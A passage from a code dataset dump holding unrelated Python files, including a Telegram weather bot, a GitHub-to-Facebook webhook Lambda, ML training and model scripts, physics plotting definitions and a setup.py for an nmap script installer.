utf-8 -*-\n\n\"\"\"\nTrigger's ACL parser.\n\nThis library contains various modules that allow for parsing, manipulation,\nand management of network access control lists (ACLs). It will parse a complete\nACL and return an ACL object that can be easily translated to any supported\nvendor syntax.\n\"\"\"\n\n__author__ = 'Jathan McCollum'\n__author__ = 'Jathan McCollum, Mike Biancaniello, Mike Harding'\n__maintainer__ = 'Jathan McCollum'\n__email__ = 'jathanism@aol.com'\n__copyright__ = 'Copyright 2010-2012, AOL Inc.'\n__version__ = (0, 1)\n\nimport os\nfrom trigger.conf import settings\n\n__all__ = ['parser', 'acl_exists']\n\n# Parser\nfrom . import parser\nfrom parser import *\n__all__.extend(parser.__all__)\n\n# Functions\ndef acl_exists(name):\n return os.access(settings.FIREWALL_DIR + '/acl.' + name, os.R_OK)\n","sub_path":"trigger/acl/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"368218323","text":"import time\n\nimport requests\nimport schedule\n\ndef send_forecast():\n latitude = '49.6618'\n longitude = '32.0477'\n\n response = requests.get('https://api.openweathermap.org/data/2.5/onecall?lat={}&lon={}&lang=uk&appid=${openweathermap-key}'.format(latitude, longitude))\n forecast = response.json()['daily'][0]['weather'][0]['description']\n\n if 'дощ' in forecast:\n text = \"Сьогодні буде \" + forecast + ' 😿'\n else:\n text = \"Сьогодні буде \" + forecast + ' 😺'\n requests.post('https://api.telegram.org/bot${telegram-bot-token}/sendMessage', {\"chat_id\": \"${chat-ID}\", \"text\": text})\n\nschedule.every().day.at(\"09:24\").do(send_forecast)\n\nsend_forecast()\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432994605","text":"#!/usr/bin/env python\n\nimport re\nimport subprocess\nimport glob\n\n\ndef initiate_inp():\n\tflnms = glob.glob('../../original_inpfiles/*.inp')\n\tprint(flnms)\n\n\t#filename = \"inpt_files/14N32S.inp\"\n\n\tfor filename in flnms:\n\t\tsubprocess.call([\"chmod\", \"666\", filename])\n\n\t\twith open(filename, 'r') as file:\n\t\t\tmolecule = filename.split('/')[-1].split('.')[0]\n\t\t\tprint(molecule)\n\n\t\t\ttxt = str(file.read())\n\t\t\n\t\t\tx = re.split('intensity',txt, flags=re.I)[1]\n\t\t\tx = re.split('end', x, flags= re.I)[0]\n\t\t\t#x = x[0]\n\t\t\t#print(x)\n\t\t\n\t# \t\ty = re.search('intensity.*end', txt, re.I| re.S).group(0)\n\n\t\n\t\t\tcommon = f'''\\n absorption\n thresh_intes 1e-30\n thresh_coeff 1e-30\n thresh_dipole 1e-30\n temperature 1000.0\n J, 0.5,20.5\n zpe 0.0\n linelist {molecule}_J20_1000K_e-0\\n'''\n\n\t\n\t\t#Keep setting that are unique? to molecule\n\t\n\t\t\tsrch = re.search('.*nspin.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*gns.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*freq-window.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*energy low.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\t\n\t\t\tsrch = re.search('.*selection.*\\n', txt)\n\t\t\tif srch is not None:\n\t\t\t\tcommon = common + srch.group()\n\t\n\t\t\t#print(common)\n\n\n\t# \tGet rid of lande and qstat in the intensity section \n\t# \t\tsrch = re.search('lande.*\\n\\s*', txt)\n\t# \t\tprint(srch)\n\t# \t\tif srch is not None:\n\t# \t\t\tprint(srch.group())\n\t# \t\t\tupx = re.sub(srch.group(), ' ', upx)\n\t# \t\t\t\t\n\t# \t\tsrch = re.search('qstat.*\\n\\s*', txt)\n\t# \t\tprint(srch)\n\t# \t\tif srch is not None:\n\t# \t\t\tprint(srch.group())\n\t# \t\t\tupx = re.sub(srch.group(), ' ', upx)\n\t# \t\tprint(x)\n\t# \t\tprint(upx)\n\t# \t\ttxt = re.sub(x, upx, txt)\n\n\t\t#update \n\n\t\t\ttxt = txt.replace(x, common)\n\t\t\t#print(txt)\n\t\n\t\twith open(f'../../run/{molecule}_e-0.inp', 'w') as file:\n\t\t\tfile.write(txt)\n\t\t\n\t\twith open(f'../../run/{molecule}_e-0.inp', 'r') as file:\n\t\t\ttxt = str(file.read())\n\t\t\tdeltam = 1+ 10**(-4)\n\t\t\n\t\t\n\t\t\tmolmass = txt.split('masses')[1].split('\\n')[0]\n\t\t\tprint(molmass)\n\t\t\tmass1 = float(molmass.split()[0])\n\t\t\tmass2 = float(molmass.split()[1])\n\t\t\n\t\t\tmass1_up = mass1*deltam\n\t\t\tmass2_up = mass2*deltam\n\t\t\tprint(f' {mass1_up} {mass2_up}')\n\t\t\t\n\t\t\tsrch = re.search('linelist.*\\n\\s*', txt)\n\t\t\tif srch is not None:\n\t\t\t\tprint(srch.group())\n\t\t\t\ttxt = re.sub(srch.group(), f'linelist {molecule}_J20_1000K_e-4 \\n ', txt)\n\t\t\tprint(re.search('linelist.*\\n\\s*', txt).group())\t\n\t\t\t\t\n\t\t\t\n\t\t\ttxt = txt.replace(molmass, f' {mass1_up} {mass2_up}')\n\t\t\n\t\twith open(f'../../run/{molecule}_e-4.inp', 'w') as file:\n\t\t\tfile.write(txt)\n\n\ninitiate_inp()\n\n\t\t\n\t\t\n\t\t\n\t\t\n\t\t\n","sub_path":"Exomol_db/func_reg_init.py","file_name":"func_reg_init.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"311054848","text":"import hashlib\nimport hmac\nimport json\nimport os\n\nfrom botocore.vendored import requests\n\n\ndef lambda_handler(event, context):\n post_headers = {\n \"Authorization\": \"Bearer {}\".format(os.environ['FB_API_TOKEN']),\n }\n url = \"https://graph.facebook.com/{}/feed\".format(\n os.environ['FB_GROUP_ID'],\n )\n\n headers = event[\"headers\"]\n body = event[\"body\"]\n\n github_event = headers.get(\"X-GitHub-Event\")\n\n computed_signature = hmac.new(\n bytes(os.environ[\"GITHUB_WEBHOOK_SECRET\"], \"UTF-8\"),\n bytes(body, \"UTF-8\"),\n hashlib.sha1\n ).hexdigest()\n\n sha, signature = headers.get(\"X-Hub-Signature\").split('=')\n\n if computed_signature != signature:\n print(\"Invalid signature: \", computed_signature, signature)\n return {\"statusCode\": 400, \"body\": \"Invalid signature\"}\n\n handled_events = {'pull_request', 'status'}\n\n if github_event not in handled_events:\n return {\"statusCode\": 200, \"body\": \"Unsupported event\"}\n\n body = json.loads(body)\n\n if github_event == 'pull_request':\n allowed_actions = {\"opened\", \"closed\", \"reopened\"}\n action = body.get(\"action\")\n if action not in allowed_actions:\n return {\"statusCode\": 200,\n \"body\": \"Unsupported pull request action\"}\n\n if action == \"closed\" and body.get(\"merged\"):\n action = \"merged\"\n\n pr_data = body.get(\"pull_request\")\n repo = body.get(\"repository\")\n sender = body.get(\"sender\")\n msg = \"[{}] {} **{}** a pull request\\n[**# {} {}**]({})\\n{}\\n\".format(\n repo.get(\"full_name\"),\n sender.get(\"login\"),\n action,\n body.get(\"number\"),\n pr_data.get(\"title\"),\n pr_data.get(\"html_url\"),\n pr_data.get(\"body\"),\n )\n\n if github_event == 'status':\n allowed_states = {\"failure\", \"error\"}\n state = body.get(\"state\")\n if state not in allowed_states:\n return {\"statusCode\": 200,\n \"body\": \"Unsupported status action\"}\n repo = body.get(\"name\")\n ci_project = body.get(\"context\").split(\":\")[-1].strip()\n\n ci_url = body.get(\"target_url\")\n ci_build_number = ci_url.split(\"/\")[-1].split(\"?\")[0]\n commit_data = body.get(\"commit\")\n author_data = commit_data.get(\"author\")\n author = author_data.get(\"login\")\n\n commit_commit_data = commit_data.get(\"commit\")\n commit_message = commit_commit_data.get(\"message\").replace(\"\\n\", \" \")\n commit_url = commit_data.get(\"html_url\")\n commit_number = commit_url.split(\"/\")[-1][0:7]\n branch_data = body.get(\"branches\")[0]\n branch_name = branch_data.get(\"name\")\n retry_url = \"https://circleci.com/actions/retry/github/{}/{}\".format(repo, ci_build_number)\n msg = \"[{}] **{}**: {}'s circleci build # [{}]({}) ({})\\n\\nBranch [{}/{}]({}):\\n>{}\\n\\nActions: [Rebuild]({})\".format(\n repo,\n state.upper(),\n author,\n ci_build_number,\n ci_url,\n ci_project,\n branch_name,\n commit_number,\n commit_url,\n commit_message,\n retry_url,\n )\n\n data = {\n 'formatting': 'MARKDOWN',\n 'message': msg,\n }\n requests.post(url, headers=post_headers, data=data)\n print(\"Posted to group!\")\n return {\"statusCode\": 200, \"body\": \"Victory!\"}\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"558478872","text":"import sys\nfrom datetime import datetime\n\nimport keras.backend as k\nimport tensorflow as tf\n\nfrom utils import factory\nfrom utils.args import get_args\nfrom utils.config import process_config\nfrom utils.dirs import create_dirs\nfrom utils.logging import logger\n\n\ndef main():\n ##########################################################\n # TensorFlow configuration\n tf_config = tf.ConfigProto()\n tf_config.gpu_options.allow_growth = True\n k.tensorflow_backend.set_session(tf.Session(config=tf_config))\n ##########################################################\n\n # capture the config path from the run arguments\n # then process the json configuration fill\n try:\n args = get_args()\n config = process_config(args.config)\n\n # create the experiments dirs\n create_dirs([config.callbacks.tensorboard_log_dir, config.callbacks.checkpoint_dir])\n\n logger('Creating data generators ...'.format(datetime.now()))\n data_loader = {'train': factory.create(\"data_loader.\"+config.data_loader.name)(config, subset='train', shuffle=True),\n 'eval': factory.create(\"data_loader.\" + config.data_loader.name)(config, subset='eval')}\n\n logger('Creating the model ...'.format(datetime.now()))\n model = factory.create(\"models.\"+config.model.name)(config)\n\n logger('Creating the trainer ...'.format(datetime.now()))\n if config.model.num_gpus > 1:\n trainer = factory.create(\"trainers.\"+config.trainer.name)(model.parallel_model, data_loader, config)\n else:\n trainer = factory.create(\"trainers.\"+config.trainer.name)(model.model, data_loader, config)\n\n logger('Starting model training ...'.format(datetime.now()))\n trainer.train()\n \n logger('Training has finished!'.format(datetime.now()))\n\n except Exception as e:\n logger(e)\n sys.exit(1)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"430034480","text":"try:\n ## the normal way to import from rootplot\n from rootplot.tree2hists import RootTree, Plot\nexcept ImportError:\n ## special import for CMSSW installations of rootplot\n from PhysicsTools.PythonAnalysis.rootplot.tree2hists import RootTree, Plot\nfrom array import array # to allow making Float_t arrays for ROOT hists\nfrom math import pi\nfrom ROOT import TH1D, TH2F # import other kinds of hists as neeeded\n\ndef lp(treename,filename,target):\n\tspecific_plots = []\n\tif 'El' in treename:\n\t\tisorangemax=0.15\n\telif 'Mu' in treename:\n\t\tisorangemax=0.15\n\t\tspecific_plots = [\n\t\tPlot(\"Muonparam[5]\" , TH1D(\"leptonNVHits\" , \";Lepton Number of valid hits ;entries/bin\", 52, -0.5, 50.5)),\n\t\tPlot(\"Muonparam[8]\" , TH1D(\"leptonNVPixelHits\" , \";Lepton Number of valid pixel hits ;entries/bin\", 17, -0.5, 15.5)),\n\t\tPlot(\"Muonparam[3]\" , TH1D(\"leptonchi2\" , \";Lepton #chi^{2} ;entries/bin\", 15, 0., 15.)),\n\t\tPlot(\"Muonparam[4]\" , TH1D(\"leptonTrackerLayersWithMeasurement\" , \";Lepton # tracker layers with measurement ;entries/bin\", 22, -0.5, 20.5)),\n\t\tPlot(\"Muonparam[9]\" , TH1D(\"leptonMatchedStations\" , \";Lepton # of matched tracker stations ;entries/bin\", 11, -0.5, 10.5)),\n\t\tPlot(\"Muonparam[6]\" , TH1D(\"leptond0\" , \";Lepton d0 [cm] ;entries/bin\", 100, -0.2, 0.2)),\n\t\tPlot(\"Muonparam[7]\" , TH1D(\"leptonz0\" , \";Lepton z0 [cm] ;entries/bin\", 100, -2., 2.))\n\t\t]\n\telse:\n\t\traise NameError('Tree name %s is not recognized'%treename)\n\n\tfrom listofplots_cards import targetvar\n\tbdtplot = targetvar(target)\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#if 'Data' in filename: bdtplot = Plot(\"-666.\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw>0.6?-10.:BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t# if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT1\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\tif 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT1\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 20, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 25, -1., 1.))\n\t#if 'Data' in filename and 'BDT' in target: bdtplot = Plot(\"BDT9and10jetsplitNoNjw.BDT9and10jetsplitNoNjw\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 10, -1., 1.))\n\t#if 'Data' in filename: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"BDT\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1.0, 0.5))\n\t#else: bdtplot = Plot(\"BDTninejet.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 32, -0.6, 1.))\n\t#else: bdtplot = Plot(\"Gradninejet.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 10, -5., 5.))\n\t#else: bdtplot = Plot(\"BDTjetsplit.MVAoutput\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#else: bdtplot = Plot(\"BDTjetsplit.BDTjetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\t#else: bdtplot = Plot(\"BDTjetsplit.BDTjetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t#else: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 30, -1., 0.5))\n\t##else: bdtplot = Plot(\"BDT9and10jetsplit.BDT9and10jetsplit\" , TH1D(\"bdt\" , \";BDT;entries/bin\", 50, -1., 1.))\n\tplots_list = [bdtplot,\n\tPlot(\"multitopness\" , TH1D(\"multitopness\" , \"; Topness;entries/bin\", 10, -0.7, 0.35)),\n\tPlot(\"jetvec[][0]\" , TH1D(\"jetpt\" , \";jet p_{T} (GeV);entries/bin\", 10, 30., 1530.)),\n\tPlot(\"jetvec[][1]\" , TH1D(\"jeteta\" , \";jet #eta;entries/bin\", 10, -2.5, 2.5)),\n\tPlot(\"jetvec[][2]\" , TH1D(\"jetphi\" , \";jet #phi;entries/bin\", 10, -pi, pi)),\n\tPlot(\"jetvec[][3]\" , TH1D(\"jetcsv\" , \";jet CSVv2;entries/bin\", 10, 0., 1.)),\n\tPlot(\"1stjetpt\" , TH1D(\"1stjetpt\" , \";1st jet p_{T} (GeV);entries/bin\", 10, 30., 1530.)),\n\tPlot(\"2ndjetpt\" , TH1D(\"2ndjetpt\" , \";2nd jet p_{T} (GeV);entries/bin\", 10, 30., 1030.)),\n\tPlot(\"5thjetpt\" , TH1D(\"5thjetpt\" , \";5th jet p_{T} (GeV);entries/bin\", 10, 30., 230.)),\n\tPlot(\"6thjetpt\" , TH1D(\"6thjetpt\" , \";6th jet p_{T} (GeV);entries/bin\", 10, 30., 230.)),\n\tPlot(\"LeptonPt\" , TH1D(\"leptonpt\" , \";Lepton p_{T} (GeV);entries/bin\", 10, 0., 800.)),\n\tPlot(\"LeptonEta\" , TH1D(\"leptoneta\" , \";Lepton #eta ;entries/bin\", 10, -2.5, 2.5)),\n\tPlot(\"leptonphi\" , TH1D(\"leptonphi\" , \";Lepton #phi ;entries/bin\", 10, -pi, pi)),\n\tPlot(\"leptonIso\" , TH1D(\"leptonIso\" , \";Lepton Isolation ;entries/bin\", 10, 0., isorangemax)),\n\tPlot(\"nLtags\" , TH1D(\"nltags\" , \";Number of loose tags;entries/bin\", 8, -0.5, 7.5)),\n\tPlot(\"nMtags\" , TH1D(\"nmtags\" , \";Number of medium tags;entries/bin\", 4, 1.5, 5.5)),\n\tPlot(\"nTtags\" , TH1D(\"nttags\" , \";Number of tight tags;entries/bin\", 5, -0.5, 4.5)),\n\tPlot(\"nJets\" , TH1D(\"njets\" , \";Number of jets;entries/bin\", 4, 6.5, 10.5)),\n\tPlot(\"HT\" , TH1D(\"ht\" , \";HT (GeV);entries/bin\", 10, 150., 2150.)),\n\tPlot(\"HTb\" , TH1D(\"HTB\" , \";HTB (GeV);entries/bin\", 10, 0., 1000.)),\n\tPlot(\"HTH\" , TH1D(\"HTH\" , \";HTH;entries/bin\", 10, 0.1, 1.1)),\n\tPlot(\"HTRat\" , TH1D(\"HTRat\" , \";HTRat;entries/bin\", 10, 0., 0.45)),\n\tPlot(\"HTX\" , TH1D(\"HTX\" , \";HTX (GeV);entries/bin\", 10, 0., 3000.)),\n\tPlot(\"SumJetMassX\" , TH1D(\"SumJetMassX\" , \";Sum jet M (GeV);entries/bin\", 10, 0., 3500.)),\n\tPlot(\"PU\" , TH1D(\"pu\" , \";Number of prim. v.;entries/bin\", 10, -0.5, 54.5)),\n\tPlot(\"NjetsW\" , TH1D(\"njetsw\" , \";p_{T} weighted jet multiplicity;entries/bin\", 10, -0.5, 15.5)),\n\t#Plot(\"SFlepton\" , TH1D(\"SFlepton\" , \";Event SF due to leptons;entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFbtag\" , TH1D(\"SFbtag\" , \";Event SF due to btag;entries/bin\", 100, 0., 5.)),\n\t#Plot(\"SFbtagUp\" , TH1D(\"SFbtagUp\" , \";Event SF due to btag (up variation);entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFbtagDown\" , TH1D(\"SFbtagDown\" , \";Event SF due to btag (down variation);entries/bin\", 100, 0., 2.5)),\n\t#Plot(\"SFPU\" , TH1D(\"SFPU\" , \";Event SF due to PU;entries/bin\", 100, 0., 5.)),\n\tPlot(\"met\" , TH1D(\"met\" , \";MET (GeV);entries/bin\", 10, 0., 400.)),\n\t#Plot(\"csvJetcsv1\" , TH1D(\"csvJetcsv1\" , \";CSV1;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetcsv2\" , TH1D(\"csvJetcsv2\" , \";CSV2;entries/bin\", 10, 0., 1.)),\n\tPlot(\"csvJetcsv3\" , TH1D(\"csvJetcsv3\" , \";CSV3;entries/bin\", 10, 0., 1.)),\n\tPlot(\"csvJetcsv4\" , TH1D(\"csvJetcsv4\" , \";CSV4;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt1\" , TH1D(\"csvJetpt1\" , \";CSV1;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt2\" , TH1D(\"csvJetpt2\" , \";CSV2;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt3\" , TH1D(\"csvJetpt3\" , \";CSV3;entries/bin\", 10, 0., 1.)),\n\t#Plot(\"csvJetpt4\" , TH1D(\"csvJetpt4\" , \";CSV4;entries/bin\", 10, 0., 1.))\n\t]\n\tplots_list += specific_plots\n\treturn plots_list\n","sub_path":"result/listofplots.py","file_name":"listofplots.py","file_ext":"py","file_size_in_byte":7968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"630365078","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nimport tflearn\nfrom tflearn.layers.conv import conv_2d, max_pool_2d\nfrom tflearn.layers.core import input_data, dropout, fully_connected\nfrom tflearn.layers.estimator import regression\nfrom tflearn.optimizers import SGD\nfrom tflearn.optimizers import RMSProp\n\nfrom config import learningRate\n\ndef createModel(nbClasses,imageSize, sliceHeight):\n\tprint(\"[+] Creating model...\")\n\tconvnet = input_data(shape=[None, imageSize, sliceHeight, 1], name='input')\n\n\n\tconvnet = conv_2d(convnet, 32, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 64, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 128, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 256, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 512, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = conv_2d(convnet, 1024, 2, activation='elu', weights_init=\"Xavier\")\n\tconvnet = max_pool_2d(convnet, 2)\n\n\tconvnet = fully_connected(convnet, 2048, activation='elu')\n\tconvnet = dropout(convnet, 0.5)\n\n\tconvnet = fully_connected(convnet, nbClasses, activation='softmax')\n\trmsprop = RMSProp(learning_rate=learningRate, decay=0.999)\n#\tsgd = SGD(learning_rate=learningRate, lr_decay=0.96, decay_step=100)\n\tconvnet = regression(convnet, optimizer='rmsprop', loss='categorical_crossentropy')\n#\tconvnet = regression(convnet, optimizer='sgd', loss='categorical_crossentropy')\n\n\tmodel = tflearn.DNN(convnet)\n\tprint(\" Model created! ✅\")\n\treturn model\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158968923","text":"class Kettle(object):\n\n power_source = \"electricity\" \\\n \"\"\n def __init__(self, make, price):\n self.make = make\n self.price = price\n self.on = False\n\n def switch_on(self):\n self.on = True\n\nkenwood = Kettle(\"kenwood\", 13.55)\nhamilton = Kettle(\"hamilton\", 19.99)\nprint(\"Kettles: {0.make} = {0.price} and {1.make} = {1.price}\".format(kenwood, hamilton))\n\n\nprint(hamilton.on)\nhamilton.switch_on()\nprint(hamilton.on)\n\nKettle.switch_on(kenwood)\nprint(kenwood.on)\n\nkenwood.power = 1.5\nprint(kenwood.power)\n\nprint (\"{} {} {}\".format(Kettle.power_source, kenwood.power_source, hamilton.power_source))","sub_path":"OOPS/oop.py","file_name":"oop.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"234866516","text":"# !/usr/bin/env python3\r\n\r\nimport pathlib\r\nfrom setuptools import setup\r\n\r\nwith open(\"README.md\", \"r\") as fh:\r\n long_description = fh.read()\r\n\r\nwith open('requirements.txt') as f:\r\n required = f.read().splitlines()\r\n\r\nwith open(\"nse_install/__init__.py\") as ver:\r\n init = ver.read()\r\n\r\nversion = init.split(\"=\")[-1].strip().strip(\"\\\"\")\r\n\r\n\r\n# test dependencies\r\ntest_deps = [\r\n 'pytest',\r\n 'pytest-cov',\r\n]\r\nextras = {\r\n 'test': test_deps,\r\n}\r\n\r\n# This call to setup() does all the work\r\nsetup(\r\n name=\"nse_install\",\r\n version=version,\r\n description=\"Install and update external NSE script for nmap\",\r\n long_description=long_description,\r\n long_description_content_type=\"text/markdown\",\r\n url=\"https://github.com/remiflavien1/nse-install\",\r\n author=\"shadawck\",\r\n author_email=\"hug211mire@gmail.com\",\r\n license=\"MIT\",\r\n classifiers=[\r\n \"License :: OSI Approved :: MIT License\",\r\n \"Programming Language :: Python :: 3\",\r\n \"Programming Language :: Python :: 3.7\",\r\n \"Topic :: System :: Installation/Setup\",\r\n 'Topic :: Security',\r\n ],\r\n packages=[\"nse_install\"],\r\n #package_dir={'nse_install':'nse_install'}, \r\n #package_data={\r\n # 'nse_install': ['script.toml'],\r\n #},\r\n data_files=[\r\n ('/etc/nse_install/', ['script.toml']),\r\n ],\r\n keywords='security, nse, nmap, pentest, scan, enumeration',\r\n tests_require=test_deps,\r\n extras_require=extras,\r\n install_requires=required,\r\n entry_points={\r\n \"console_scripts\": [\r\n \"nse_install=nse_install.__main__:main\",\r\n ]\r\n },\r\n)\r\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422923483","text":"#!/usr/bin/env python3\n# 第 0006 题:你有一个目录,放了你一个月的日记,都是 txt,\n# 为了避免分词的问题,假设内容都是英文,请统计出你认为每篇日记最重要的词。\n\nimport os\nimport re\n\ndef legalname(filename):\n fn = filename.split('.')\n return fn[0]!='' and fn[-1].lower()=='txt'\n\n\ndef maxWord(filepath):\n val = 0\n dic = dict()\n text = open(filepath, 'rU').read()\n words = re.findall(r'[a-zA-Z0-9-’\\']+', text)\n for word in words:\n word = word.lower()\n if dic.get(word, 0) == 0:\n dic[word] = 0\n dic[word] += 1\n val = max(val, dic[word])\n words = []\n for key in dic:\n if dic[key] == val:\n words.append(key)\n return val, words\n\n\nif __name__ == '__main__':\n # 指明被遍历的文件夹\n rootdir =os.path.abspath(os.curdir)+'/assets/'\n for parent,dirnames,filenames in os.walk(rootdir):\n for filename in filenames:\n if legalname(filename):\n infile = os.path.join(parent,filename)\n m = maxWord(infile)\n print(' ', filename, '\\t%d times appeared: %s'%m)\n # im = Image.open(infile) ### 此处Image.open(dir)为多数对象应用的基础.\n # im.thumbnail(size) ### 此处size 为长度为2的tuple类型,改变图片分辨率\n # im.save(infile) ### im.save(dir),图片处理的最后都用这个,就是保存处理过后的图片\n","sub_path":"code/0006.py","file_name":"0006.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"81293279","text":"import sys\n\nsys.stdin = open(\"in1.txt\", \"rt\")\n\n'''\n1부터 N까지의 모든 자연수로 구성된 길이 N의 수열이 주어집니다.\n이 수열의 왼쪽 맨 끝 숫자 또는 오른쪽 맨 끝 숫자 중 하나를 가져와 나열하여 가장 긴 증가수열\n을 만듭니다. 이때 수열에서 가져온 숫자(왼쪽 맨 끝 또는 오른쪽 맨 끝)는 그 수열에서 제거됩니\n다.\n예를 들어 2 4 5 1 3 이 주어지면 만들 수 있는 가장 긴 증가수열의 길이는 4입니다.\n맨 처음 왼쪽 끝에서 2를 가져오고, 그 다음 오른쪽 끝에서 3을 가져오고, 왼쪽 끝에서 4,\n왼쪽 끝에서 5를 가져와 2 3 4 5 증가수열을 만들 수 있습니다.\n▣ 입력설명\n첫째 줄에 자연수 N(3<=N<=100)이 주어집니다.\n두 번째 줄에 N개로 구성된 수열이 주어집니다.\n▣ 출력설명\n첫째 줄에 최대 증가수열의 길이를 출력합니다.\n두 번째 줄에 가져간 순서대로 왼쪽 끝에서 가져갔으면 ‘L', 오른쪽 끝에서 가져갔으면 ’R'를 써\n간 문자열을 출력합니다.(단 마지막에 남은 값은 왼쪽 끝으로 생각합니다.)\n'''\n\nN = int(input())\narr = list(map(int, input().split()))\nlt = 0\nrt = N - 1\nlastNum = 0\nres = \"\"\n\nwhile lt <= rt:\n temp = []\n if arr[lt] > lastNum:\n temp.append((arr[lt], 'L'))\n if arr[rt] > lastNum:\n temp.append((arr[rt], 'R'))\n\n if not temp:\n break\n else:\n temp.sort()\n res += temp[0][1]\n lastNum = temp[0][0]\n if temp[0][1] == 'L':\n lt += 1\n else:\n rt -= 1\n\nprint(len(res))\nprint(res)\n","sub_path":"섹션 4/9. 증가수열 만들기/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"358848687","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-i686/egg/dnsmon/resolver.py\n# Compiled at: 2011-03-21 18:00:36\n\"\"\"Wrapper to pyDNS to retrieve all DNS results for a given hostname\"\"\"\nimport DNS\nDNS.ParseResolvConf()\nresolver = 